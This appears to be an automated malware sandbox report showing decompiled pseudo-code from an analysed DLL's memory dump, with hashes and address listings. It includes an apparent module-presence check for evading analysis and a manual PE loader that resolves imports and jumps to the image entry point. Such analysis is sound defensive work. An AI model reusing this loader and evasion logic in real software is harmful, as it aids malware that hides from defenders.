                                                                                                                                                                                                0x100130e5
                                                                                                                                                                                                0x100130e7
                                                                                                                                                                                                0x100130eb
                                                                                                                                                                                                0x100130ed
                                                                                                                                                                                                0x100130ef
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100130ef
                                                                                                                                                                                                0x100130eb
                                                                                                                                                                                                0x100130dc
                                                                                                                                                                                                0x100130dc
                                                                                                                                                                                                0x100130df
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x100130df
                                                                                                                                                                                                0x100130da
                                                                                                                                                                                                0x10013137
                                                                                                                                                                                                0x10013139
                                                                                                                                                                                                0x10013139
                                                                                                                                                                                                0x10013144
                                                                                                                                                                                                0x10012fe7
                                                                                                                                                                                                0x10012fe7
                                                                                                                                                                                                0x10012fea
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012fec
                                                                                                                                                                                                0x10012fec
                                                                                                                                                                                                0x10012fee
                                                                                                                                                                                                0x10012ff2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012ff4
                                                                                                                                                                                                0x10012ff4
                                                                                                                                                                                                0x10012ff4
                                                                                                                                                                                                0x10012ff7
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012ffb
                                                                                                                                                                                                0x10013004
                                                                                                                                                                                                0x10013004
                                                                                                                                                                                                0x10012ff7
                                                                                                                                                                                                0x10012ff2
                                                                                                                                                                                                0x10012fea
                                                                                                                                                                                                0x10012fd6
                                                                                                                                                                                                0x10012fdf
                                                                                                                                                                                                0x10012fdf

                                                                                                                                                                                                APIs
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: memcpy
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3510742995-0
                                                                                                                                                                                                • Opcode ID: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
                                                                                                                                                                                                • Instruction ID: b8b21e117a170e539179d3266b9c205756a6e1e5336b1e784b578d53a4793964
                                                                                                                                                                                                • Opcode Fuzzy Hash: 02feba5ad5f49e0a995842d61c8ce91333d91de9632e587c2a68fb90f2e6a76c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 49D123B5600A009FCB28CF69C8D4A5AB7F1FF88344B25892DE88ACB711D731F995CB50
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 10004D60, Relevance: 6.4, APIs: 4, Instructions: 432stringCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                                                                			E10004D60(intOrPtr* __ecx, void* __edx, void* __fp0) {
				char _v516;
				char _v556;
				char _v564;
				char _v568;
				char _v572;
				char _v576;
				intOrPtr _v580;
				char _v588;
				signed int _v596;
				intOrPtr _v602;
				intOrPtr _v604;
				char _v608;
				CHAR* _v612;
				CHAR* _v616;
				signed int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				char _v636;
				intOrPtr _t119;
				signed int _t122;
				CHAR* _t124;
				intOrPtr _t125;
				CHAR* _t127;
				WCHAR* _t130;
				intOrPtr _t133;
				intOrPtr _t137;
				WCHAR* _t138;
				intOrPtr _t142;
				WCHAR* _t143;
				CHAR* _t144;
				intOrPtr _t145;
				intOrPtr _t150;
				intOrPtr _t153;
				WCHAR* _t154;
				signed int _t159;
				WCHAR* _t160;
				intOrPtr _t163;
				intOrPtr _t165;
				intOrPtr _t166;
				intOrPtr _t170;
				signed int _t173;
				signed int _t178;
				intOrPtr _t182;
				WCHAR* _t184;
				char _t186;
				WCHAR* _t188;
				intOrPtr _t200;
				intOrPtr _t211;
				signed int _t215;
				char _t220;
				WCHAR* _t231;
				intOrPtr _t235;
				intOrPtr _t238;
				intOrPtr _t239;
				intOrPtr _t246;
				signed int _t248;
				WCHAR* _t249;
				CHAR* _t250;
				intOrPtr _t262;
				void* _t271;
				intOrPtr _t272;
				signed int _t277;
				void* _t278;
				intOrPtr _t280;
				signed int _t282;
				void* _t298;
				void* _t299;
				intOrPtr _t305;
				CHAR* _t326;
				void* _t328;
				WCHAR* _t329;
				intOrPtr _t331;
				WCHAR* _t333;
				signed int _t335;
				intOrPtr* _t337;
				void* _t338;
				void* _t339;
				void* _t353;

				_t353 = __fp0;
				_t337 = (_t335 & 0xfffffff8) - 0x26c;
				_t119 =  *0x1001e688; // 0x4cb04a0
				_v620 = _v620 & 0x00000000;
				_t328 = __ecx;
				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
					L7:
					_t14 = E1000B7EA(0x1001b9c4,  &_v516) + 1; // 0x1
					E1000A8AF( &_v556, _t14, _t351);
					_t298 = 0x64;
					_t122 = E1000A4B3( &_v556, _t298);
					 *0x1001e748 = _t122;
					if(_t122 != 0) {
						_push(0x4e5);
						_t299 = 0x10;
						 *0x1001e680 = E1000E1FE(0x1001b9c8, _t299);
						 *_t337 = 0x610;
						_t124 = E100095C2(0x1001b9c8);
						_push(0);
						_push(_t124);
						_v612 = _t124;
						_t125 =  *0x1001e688; // 0x4cb04a0
						_t127 = E100092C6(_t125 + 0x228);
						_t338 = _t337 + 0xc;
						_v616 = _t127;
						E100085B6( &_v612);
						_t130 = E1000B2AB(_t127);
						_t246 = 3;
						__eflags = _t130;
						if(_t130 != 0) {
							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
							 *_t328 = _t246;
						}
						E100085FB( &_v616, 0xfffffffe);
						_t133 =  *0x1001e688; // 0x4cb04a0
						_t21 = _t133 + 0x110; // 0x4d2fb70
						_t22 = _t133 + 0x114; // 0x4cb05b4
						E100049FE( *((intOrPtr*)( *_t21)), _t22, _t353, _t328, 0, 0);
						_t262 =  *0x1001e688; // 0x4cb04a0
						_t339 = _t338 + 0x14;
						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
							L17:
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							asm("stosd");
							_v572 = _t328;
							_t28 = _t262 + 0x214; // 0x2
							_v576 =  *_t28;
							_t137 =  *0x1001e680; // 0x0
							_t138 =  *(_t137 + 8);
							__eflags = _t138;
							if(_t138 != 0) {
								 *_t138(0, 0, 1,  &_v568,  &_v564);
							}
							_v620 = _v620 & 0x00000000;
							E1000E308(_t353,  &_v576);
							_pop(_t262);
							_t142 =  *0x1001e6b4; // 0x4d2fa20
							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
							__eflags = _t143;
							if(_t143 == 0) {
								E1000E308(_t353,  &_v588);
								_t235 =  *0x1001e6b4; // 0x4d2fa20
								_pop(_t262);
								 *((intOrPtr*)(_t235 + 0xc))(_v632);
							}
							__eflags =  *0x1001e73c;
							if( *0x1001e73c <= 0) {
								goto L36;
							} else {
								_t165 =  *0x1001e680; // 0x0
								__eflags =  *(_t165 + 8);
								if( *(_t165 + 8) != 0) {
									_t231 =  *(_t165 + 0xc);
									__eflags = _t231;
									if(_t231 != 0) {
										 *_t231(_v580);
									}
								}
								_t166 =  *0x1001e688; // 0x4cb04a0
								_t45 = _t166 + 0x214; // 0x2
								_t262 =  *_t45;
								__eflags = _t262 - _t246;
								if(_t262 == _t246) {
									goto L36;
								} else {
									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
											E10004998();
											asm("stosd");
											asm("stosd");
											asm("stosd");
											asm("stosd");
											_t170 =  *0x1001e684; // 0x4d2f878
											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
											_t262 = _v602;
											_t248 = 0x3c;
											_t173 = _t262 + 0x00000002 & 0x0000ffff;
											_v596 = _t173;
											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
											_t178 = _t262 + 0x0000000e & 0x0000ffff;
											_v624 = _t178;
											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
											_t182 =  *0x1001e688; // 0x4cb04a0
											_t184 = E1000FC57(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
											_t339 = _t339 + 0xc;
											__eflags = _t184;
											if(_t184 >= 0) {
												_t333 = E100085E5(0x1000);
												_v616 = _t333;
												_pop(_t262);
												__eflags = _t333;
												if(_t333 != 0) {
													_t186 = E1000109A(_t262, 0x148);
													_t305 =  *0x1001e688; // 0x4cb04a0
													_v636 = _t186;
													_push(_t305 + 0x648);
													_push(0xa);
													_push(7);
													_t271 = 2;
													E1000900E(_t271,  &_v572);
													_t272 =  *0x1001e688; // 0x4cb04a0
													_t92 = _t272 + 0xa0; // 0x1
													_t188 = E100060C0( &_v572, _t272 + 0x228, 1,  *_t92);
													_t339 = _t339 + 0x18;
													_v632 = _t188;
													__eflags = _t188;
													if(_t188 != 0) {
														_push(_v624 % _t248 & 0x0000ffff);
														_push(_v628 & 0x0000ffff);
														_push(_v596 % _t248 & 0x0000ffff);
														_push(_v620 & 0x0000ffff);
														_push(_v632);
														_push( &_v572);
														_t200 =  *0x1001e688; // 0x4cb04a0
														__eflags = _t200 + 0x1020;
														E10009621(_t333, 0x1000, _v636, _t200 + 0x1020);
														E100085B6( &_v636);
														E1000A953(_t333, 0, 0xbb8, 1);
														E100085FB( &_v632, 0xfffffffe);
														_t339 = _t339 + 0x44;
													}
													E100085FB( &_v616, 0xfffffffe);
													_pop(_t262);
												}
											}
										}
										goto L36;
									}
									__eflags = _t262 - 2;
									if(_t262 != 2) {
										goto L36;
									}
									E10004998();
									asm("stosd");
									asm("stosd");
									asm("stosd");
									asm("stosd");
									_t211 =  *0x1001e684; // 0x4d2f878
									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
									_t215 = _v602 + 0x00000002 & 0x0000ffff;
									_v628 = _t215;
									_t277 = 0x3c;
									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
									_t249 = E100085E5(0x1000);
									_v624 = _t249;
									_pop(_t278);
									__eflags = _t249;
									if(_t249 != 0) {
										_t220 = E100095C2(_t278, 0x32d);
										_t280 =  *0x1001e688; // 0x4cb04a0
										_push(_t280 + 0x228);
										_t282 = 0x3c;
										_v636 = _t220;
										_push(_v628 % _t282 & 0x0000ffff);
										E10009621(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
										E100085B6( &_v636);
										E1000A953(_t249, 0, 0xbb8, 1);
										E100085FB( &_v624, 0xfffffffe);
									}
									goto L41;
								}
							}
						} else {
							_t24 = _t262 + 0x214; // 0x2
							_t238 =  *_t24;
							__eflags = _t238 - _t246;
							if(_t238 == _t246) {
								goto L17;
							}
							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
								L36:
								_t144 = E100095C2(_t262, 0x610);
								_push(0);
								_push(_t144);
								_v616 = _t144;
								_t145 =  *0x1001e688; // 0x4cb04a0
								_t329 = E100092C6(_t145 + 0x228);
								_v612 = _t329;
								__eflags = _t329;
								if(_t329 != 0) {
									_t160 = E1000B2AB(_t329);
									__eflags = _t160;
									if(_t160 != 0) {
										_t163 =  *0x1001e684; // 0x4d2f878
										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
									}
									E100085FB( &_v612, 0xfffffffe);
								}
								E100085B6( &_v616);
								_t150 =  *0x1001e688; // 0x4cb04a0
								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
								_t153 =  *0x1001e688; // 0x4cb04a0
								_t154 = _t153 + 0x228;
								__eflags = _t154;
								lstrcpynW(_t154,  *0x1001e738, 0x105);
								_t331 =  *0x1001e688; // 0x4cb04a0
								_t117 = _t331 + 0x228; // 0x4cb06c8
								 *((intOrPtr*)(_t331 + 0x434)) = E10008F9F(_t117, __eflags);
								E100085FB(0x1001e740, 0xfffffffe);
								E100085FB(0x1001e738, 0xfffffffe);
								L41:
								_t159 = 0;
								__eflags = 0;
								L42:
								return _t159;
							}
							__eflags = _t238 - 2;
							if(_t238 != 2) {
								goto L36;
							}
							goto L17;
						}
					}
					L8:
					_t159 = _t122 | 0xffffffff;
					goto L42;
				}
				_t250 = E100095A8(0x6e2);
				_v616 = _t250;
				_t326 = E100095A8(0x9f5);
				_v612 = _t326;
				if(_t250 != 0 && _t326 != 0) {
					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
						_v620 = 1;
					}
					E100085A3( &_v616);
					_t122 = E100085A3( &_v612);
					_t351 = _v620;
					if(_v620 != 0) {
						goto L8;
					}
				}
			}


















































































                                                                                                                                                                                                0x10004d60
                                                                                                                                                                                                0x10004d66
                                                                                                                                                                                                0x10004d6c
                                                                                                                                                                                                0x10004d71
                                                                                                                                                                                                0x10004d7f
                                                                                                                                                                                                0x10004d82
                                                                                                                                                                                                0x10004de1
                                                                                                                                                                                                0x10004df3
                                                                                                                                                                                                0x10004df6
                                                                                                                                                                                                0x10004dfd
                                                                                                                                                                                                0x10004e02
                                                                                                                                                                                                0x10004e07
                                                                                                                                                                                                0x10004e0e
                                                                                                                                                                                                0x10004e18
                                                                                                                                                                                                0x10004e1f
                                                                                                                                                                                                0x10004e2a
                                                                                                                                                                                                0x10004e2f
                                                                                                                                                                                                0x10004e36
                                                                                                                                                                                                0x10004e3c
                                                                                                                                                                                                0x10004e3e
                                                                                                                                                                                                0x10004e3f
                                                                                                                                                                                                0x10004e43
                                                                                                                                                                                                0x10004e4e
                                                                                                                                                                                                0x10004e53
                                                                                                                                                                                                0x10004e5c
                                                                                                                                                                                                0x10004e61
                                                                                                                                                                                                0x10004e69
                                                                                                                                                                                                0x10004e70
                                                                                                                                                                                                0x10004e71
                                                                                                                                                                                                0x10004e73
                                                                                                                                                                                                0x10004e8f
                                                                                                                                                                                                0x10004e92
                                                                                                                                                                                                0x10004e92
                                                                                                                                                                                                0x10004e9b
                                                                                                                                                                                                0x10004ea0
                                                                                                                                                                                                0x10004eaa
                                                                                                                                                                                                0x10004eb0
                                                                                                                                                                                                0x10004eb8
                                                                                                                                                                                                0x10004ebd
                                                                                                                                                                                                0x10004ec3
                                                                                                                                                                                                0x10004ec6
                                                                                                                                                                                                0x10004ecc
                                                                                                                                                                                                0x10004eeb
                                                                                                                                                                                                0x10004ef1
                                                                                                                                                                                                0x10004ef2
                                                                                                                                                                                                0x10004ef3
                                                                                                                                                                                                0x10004ef4
                                                                                                                                                                                                0x10004ef5
                                                                                                                                                                                                0x10004ef6
                                                                                                                                                                                                0x10004efa
                                                                                                                                                                                                0x10004f00
                                                                                                                                                                                                0x10004f04
                                                                                                                                                                                                0x10004f09
                                                                                                                                                                                                0x10004f0c
                                                                                                                                                                                                0x10004f0e
                                                                                                                                                                                                0x10004f20
                                                                                                                                                                                                0x10004f20
                                                                                                                                                                                                0x10004f22
                                                                                                                                                                                                0x10004f2e
                                                                                                                                                                                                0x10004f33
                                                                                                                                                                                                0x10004f39
                                                                                                                                                                                                0x10004f42
                                                                                                                                                                                                0x10004f45
                                                                                                                                                                                                0x10004f47
                                                                                                                                                                                                0x10004f52
                                                                                                                                                                                                0x10004f57
                                                                                                                                                                                                0x10004f5c
                                                                                                                                                                                                0x10004f61
                                                                                                                                                                                                0x10004f61
                                                                                                                                                                                                0x10004f64
                                                                                                                                                                                                0x10004f6b
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004f71
                                                                                                                                                                                                0x10004f71
                                                                                                                                                                                                0x10004f76
                                                                                                                                                                                                0x10004f7a
                                                                                                                                                                                                0x10004f7c
                                                                                                                                                                                                0x10004f7f
                                                                                                                                                                                                0x10004f81
                                                                                                                                                                                                0x10004f87
                                                                                                                                                                                                0x10004f87
                                                                                                                                                                                                0x10004f81
                                                                                                                                                                                                0x10004f89
                                                                                                                                                                                                0x10004f8e
                                                                                                                                                                                                0x10004f8e
                                                                                                                                                                                                0x10004f94
                                                                                                                                                                                                0x10004f96
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004f9c
                                                                                                                                                                                                0x10004f9c
                                                                                                                                                                                                0x10004fa0
                                                                                                                                                                                                0x10005075
                                                                                                                                                                                                0x1000507b
                                                                                                                                                                                                0x10005081
                                                                                                                                                                                                0x1000508c
                                                                                                                                                                                                0x1000508d
                                                                                                                                                                                                0x1000508e
                                                                                                                                                                                                0x1000508f
                                                                                                                                                                                                0x10005095
                                                                                                                                                                                                0x1000509a
                                                                                                                                                                                                0x100050a0
                                                                                                                                                                                                0x100050a8
                                                                                                                                                                                                0x100050ae
                                                                                                                                                                                                0x100050b1
                                                                                                                                                                                                0x100050c0
                                                                                                                                                                                                0x100050c7
                                                                                                                                                                                                0x100050ca
                                                                                                                                                                                                0x100050d7
                                                                                                                                                                                                0x100050db
                                                                                                                                                                                                0x100050e8
                                                                                                                                                                                                0x100050ed
                                                                                                                                                                                                0x100050f0
                                                                                                                                                                                                0x100050f2
                                                                                                                                                                                                0x10005103
                                                                                                                                                                                                0x10005105
                                                                                                                                                                                                0x10005109
                                                                                                                                                                                                0x1000510a
                                                                                                                                                                                                0x1000510c
                                                                                                                                                                                                0x10005117
                                                                                                                                                                                                0x1000511c
                                                                                                                                                                                                0x10005129
                                                                                                                                                                                                0x1000512d
                                                                                                                                                                                                0x1000512e
                                                                                                                                                                                                0x10005130
                                                                                                                                                                                                0x10005138
                                                                                                                                                                                                0x10005139
                                                                                                                                                                                                0x1000513e
                                                                                                                                                                                                0x10005147
                                                                                                                                                                                                0x10005156
                                                                                                                                                                                                0x1000515b
                                                                                                                                                                                                0x1000515e
                                                                                                                                                                                                0x10005162
                                                                                                                                                                                                0x10005164
                                                                                                                                                                                                0x10005177
                                                                                                                                                                                                0x10005181
                                                                                                                                                                                                0x10005185
                                                                                                                                                                                                0x1000518d
                                                                                                                                                                                                0x1000518e
                                                                                                                                                                                                0x10005196
                                                                                                                                                                                                0x10005197
                                                                                                                                                                                                0x1000519c
                                                                                                                                                                                                0x100051a8
                                                                                                                                                                                                0x100051b2
                                                                                                                                                                                                0x100051c4
                                                                                                                                                                                                0x100051d0
                                                                                                                                                                                                0x100051d5
                                                                                                                                                                                                0x100051d5
                                                                                                                                                                                                0x100051df
                                                                                                                                                                                                0x100051e5
                                                                                                                                                                                                0x100051e5
                                                                                                                                                                                                0x1000510c
                                                                                                                                                                                                0x100050f2
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1000507b
                                                                                                                                                                                                0x10004fa6
                                                                                                                                                                                                0x10004fa9
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004faf
                                                                                                                                                                                                0x10004fba
                                                                                                                                                                                                0x10004fbb
                                                                                                                                                                                                0x10004fbc
                                                                                                                                                                                                0x10004fbd
                                                                                                                                                                                                0x10004fc3
                                                                                                                                                                                                0x10004fc8
                                                                                                                                                                                                0x10004fdc
                                                                                                                                                                                                0x10004fe1
                                                                                                                                                                                                0x10004fe5
                                                                                                                                                                                                0x10004ff0
                                                                                                                                                                                                0x10004ff9
                                                                                                                                                                                                0x10004ffb
                                                                                                                                                                                                0x10004fff
                                                                                                                                                                                                0x10005000
                                                                                                                                                                                                0x10005002
                                                                                                                                                                                                0x1000500d
                                                                                                                                                                                                0x10005013
                                                                                                                                                                                                0x10005025
                                                                                                                                                                                                0x10005028
                                                                                                                                                                                                0x1000502b
                                                                                                                                                                                                0x10005038
                                                                                                                                                                                                0x10005040
                                                                                                                                                                                                0x1000504a
                                                                                                                                                                                                0x1000505c
                                                                                                                                                                                                0x10005068
                                                                                                                                                                                                0x1000506d
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10005002
                                                                                                                                                                                                0x10004f96
                                                                                                                                                                                                0x10004ece
                                                                                                                                                                                                0x10004ece
                                                                                                                                                                                                0x10004ece
                                                                                                                                                                                                0x10004ed4
                                                                                                                                                                                                0x10004ed6
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004ed8
                                                                                                                                                                                                0x10004edc
                                                                                                                                                                                                0x100051e6
                                                                                                                                                                                                0x100051eb
                                                                                                                                                                                                0x100051f1
                                                                                                                                                                                                0x100051f3
                                                                                                                                                                                                0x100051f4
                                                                                                                                                                                                0x100051f8
                                                                                                                                                                                                0x10005208
                                                                                                                                                                                                0x1000520d
                                                                                                                                                                                                0x10005211
                                                                                                                                                                                                0x10005213
                                                                                                                                                                                                0x10005217
                                                                                                                                                                                                0x1000521c
                                                                                                                                                                                                0x1000521e
                                                                                                                                                                                                0x10005220
                                                                                                                                                                                                0x10005226
                                                                                                                                                                                                0x10005226
                                                                                                                                                                                                0x10005233
                                                                                                                                                                                                0x10005239
                                                                                                                                                                                                0x1000523f
                                                                                                                                                                                                0x10005244
                                                                                                                                                                                                0x10005262
                                                                                                                                                                                                0x10005264
                                                                                                                                                                                                0x10005270
                                                                                                                                                                                                0x10005270
                                                                                                                                                                                                0x10005276
                                                                                                                                                                                                0x10005278
                                                                                                                                                                                                0x1000527e
                                                                                                                                                                                                0x10005290
                                                                                                                                                                                                0x10005296
                                                                                                                                                                                                0x100052a2
                                                                                                                                                                                                0x100052aa
                                                                                                                                                                                                0x100052aa
                                                                                                                                                                                                0x100052aa
                                                                                                                                                                                                0x100052ac
                                                                                                                                                                                                0x100052b2
                                                                                                                                                                                                0x100052b2
                                                                                                                                                                                                0x10004ee2
                                                                                                                                                                                                0x10004ee5
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004ee5
                                                                                                                                                                                                0x10004ecc
                                                                                                                                                                                                0x10004e10
                                                                                                                                                                                                0x10004e10
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004e10
                                                                                                                                                                                                0x10004d8e
                                                                                                                                                                                                0x10004d95
                                                                                                                                                                                                0x10004d9e
                                                                                                                                                                                                0x10004da0
                                                                                                                                                                                                0x10004da6
                                                                                                                                                                                                0x10004db7
                                                                                                                                                                                                0x10004dc0
                                                                                                                                                                                                0x10004dc0
                                                                                                                                                                                                0x10004dcc
                                                                                                                                                                                                0x10004dd5
                                                                                                                                                                                                0x10004dda
                                                                                                                                                                                                0x10004ddf
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10004ddf

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DB3
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 10004DBA
                                                                                                                                                                                                • lstrcpynW.KERNEL32(04CB0068,00000105), ref: 10005262
                                                                                                                                                                                                • lstrcpynW.KERNEL32(04CB0278,00000105), ref: 10005276
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: HandleModulelstrcpyn
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3430401031-0
                                                                                                                                                                                                • Opcode ID: e65ca0fb4148daa740698ab9e9525690199d64fdaa5cc465d66fe570dea2e5a3
                                                                                                                                                                                                • Instruction ID: 75edd9153102fbeb7f3d0af659dc9bba35956ed8099fcea896ccea7dd972ea61
                                                                                                                                                                                                • Opcode Fuzzy Hash: e65ca0fb4148daa740698ab9e9525690199d64fdaa5cc465d66fe570dea2e5a3
                                                                                                                                                                                                • Instruction Fuzzy Hash: 23E1CC71608341AFF300DF64CC86FAA73E9EB98390F414929F584DB2D5DB75EA448B52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 10012B24, Relevance: 6.2, APIs: 4, Instructions: 219libraryloaderCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                C-Code - Quality: 52%
                                                                                                                                                                                                			E10012B24(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				signed int _v5;
				signed short _v12;
				intOrPtr* _v16;
				signed int* _v20;
				intOrPtr _v24;
				unsigned int _v28;
				signed short* _v32;
				struct HINSTANCE__* _v36;
				intOrPtr* _v40;
				signed short* _v44;
				intOrPtr _v48;
				unsigned int _v52;
				intOrPtr _v56;
				_Unknown_base(*)()* _v60;
				signed int _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				unsigned int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v88;
				signed int _t149;
				void* _t189;
				signed int _t194;
				signed int _t196;
				intOrPtr _t236;

				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
				_v24 = _v72;
				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
				_v56 = _t236;
				if(_t236 == 0) {
					L13:
					while(0 != 0) {
					}
					_push(8);
					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
						L35:
						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
						while(0 != 0) {
						}
						if(_a12 != 0) {
							 *_a12 = _v68;
						}
						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
						return _v68(_a4, 1, _a8);
					}
					_v84 = 0x80000000;
					_t149 = 8;
					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						if(_v36 == 0) {
							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
						}
						if(_v36 != 0) {
							if( *_v16 == 0) {
								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
							} else {
								_v20 =  *_v16 + _a4;
							}
							_v64 = _v64 & 0x00000000;
							while( *_v20 != 0) {
								if(( *_v20 & _v84) == 0) {
									_v88 =  *_v20 + _a4;
									_v60 = GetProcAddress(_v36, _v88 + 2);
								} else {
									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
								}
								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
									 *_v20 = _v60;
								} else {
									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
								}
								_v20 =  &(_v20[1]);
								_v64 = _v64 + 4;
							}
							_v16 = _v16 + 0x14;
							continue;
						} else {
							_t189 = 0xfffffffd;
							return _t189;
						}
					}
					goto L35;
				}
				_t194 = 8;
				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
				_t196 = 8;
				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
				while(0 != 0) {
				}
				while(_v48 > 0) {
					_v28 = _v44[2];
					_v48 = _v48 - _v28;
					_v28 = _v28 - 8;
					_v28 = _v28 >> 1;
					_v32 =  &(_v44[4]);
					_v80 = _a4 +  *_v44;
					_v52 = _v28;
					while(1) {
						_v76 = _v52;
						_v52 = _v52 - 1;
						if(_v76 == 0) {
							break;
						}
						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
						_v12 =  *_v32 & 0xfff;
						_v40 = (_v12 & 0x0000ffff) + _v80;
						if((_v5 & 0x000000ff) != 3) {
							if((_v5 & 0x000000ff) == 0xa) {
								 *_v40 =  *_v40 + _v56;
							}
						} else {
							 *_v40 =  *_v40 + _v56;
						}
						_v32 =  &(_v32[1]);
					}
					_v44 = _v32;
				}
				goto L13;
			}





























                                                                                                                                                                                                0x10012b33
                                                                                                                                                                                                0x10012b39
                                                                                                                                                                                                0x10012b42
                                                                                                                                                                                                0x10012b45
                                                                                                                                                                                                0x10012b48
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012c39
                                                                                                                                                                                                0x10012c3d
                                                                                                                                                                                                0x10012c3f
                                                                                                                                                                                                0x10012c4d
                                                                                                                                                                                                0x10012d6b
                                                                                                                                                                                                0x10012d74
                                                                                                                                                                                                0x10012d77
                                                                                                                                                                                                0x10012d7b
                                                                                                                                                                                                0x10012d81
                                                                                                                                                                                                0x10012d89
                                                                                                                                                                                                0x10012d89
                                                                                                                                                                                                0x10012d91
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10012d9c
                                                                                                                                                                                                0x10012c53
                                                                                                                                                                                                0x10012c5c
                                                                                                                                                                                                0x10012c6a
                                                                                                                                                                                                0x10012c6d
                                                                                                                                                                                                0x10012c8a
                                                                                                                                                                                                0x10012c91
                                                                                                                                                                                                0x10012ca3
                                                                                                                                                                                                0x10012ca3
                                                                                                                                                                                                0x10012caa
                                                                                                                                                                                                0x10012cba
